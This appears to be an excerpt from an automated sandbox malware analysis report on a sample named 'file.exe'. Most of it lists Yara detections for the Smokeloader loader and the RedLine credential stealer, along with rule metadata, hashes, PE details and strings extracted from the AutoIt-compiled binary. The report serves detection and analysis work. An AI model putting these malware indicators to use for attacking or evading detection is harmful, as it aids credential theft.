Source: Yara match	File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Binary is likely a compiled AutoIt script file

Source: file.exe, 00000000.00000003.348925452.0000000003B6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: file.exe, 00000000.00000003.348371414.0000000003951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: soft[1].0.dr	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
